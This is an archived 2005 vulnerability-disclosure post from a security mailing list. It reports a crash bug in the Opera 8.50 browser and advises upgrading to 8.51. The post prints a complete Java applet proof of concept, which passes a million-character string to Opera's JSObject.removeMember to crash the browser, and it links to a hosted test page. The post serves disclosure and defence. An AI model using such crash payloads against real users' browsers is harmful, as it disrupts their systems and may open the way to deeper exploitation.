Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Opera 8.50 DoS with simple java applet

from [Marc Schoenefeld] Network Security [Permanent Link]
Subject: Opera 8.50 DoS with simple java applet
Date: Wed, 30 Nov 2005 00:31:29 +0100 
Hi y'all,

it is possible to crash the opera 8.50 browser with a simple
java applet (see below).
This was observed on Win32, Linux versions maybe affected, too.
This can be tested only at:

http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

As you can see the applet crashes at 0x67c0a54c. This is
caused by a bug in a JNI routine implementing the com.opera.JSObject class.
It cannot be ruled out, that this bug is exploitable.

The opera guys were informed on the 21st of September, and
then again on 8th of October.

Please upgrade to the new Opera 8.51, which does not expose this
weakness.

Sincerely
Marc Schönefeld
marc@illegalaccess.org


import java.applet.Applet;
import java.awt.Graphics;

import netscape.javascript.JSObject;

public class OperaTest extends Applet{
        static {
        System.out.println("Loaded 1.2");
    }
        public void paint(Graphics g) {
        System.out.println("start");
        try {
        netscape.javascript.JSObject jso = JSObject.getWindow(this);
        System.out.println(jso.getClass());
        com.opera.JSObject j = (com.opera.JSObject ) jso;
        char[] x = new char[1000000];
                for (int y = 0 ; y < x.length; y++) {
            x [y] = 'A';
        }
        String z = new String(x);
                    System.out.println("after evalb");
        j.removeMember(z);
        System.out.println("after remove");
        }
        catch (Exception e) {
            e.printStackTrace();
        }
    }
}




[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: DNS query spam, Joe
Next by Date:  MDKSA-2005:219 - Updated kernel packages fix numerous vulnerabilities, Mandriva Security Team
Previous by Thread:  Gallery 2.x Security Advisory, Bharat Mediratta
Next by Thread:  Re: Opera 8.50 DoS with simple java applet, Edward D Wiget
Indexes:  [Date] [Thread] [Top] [All Lists]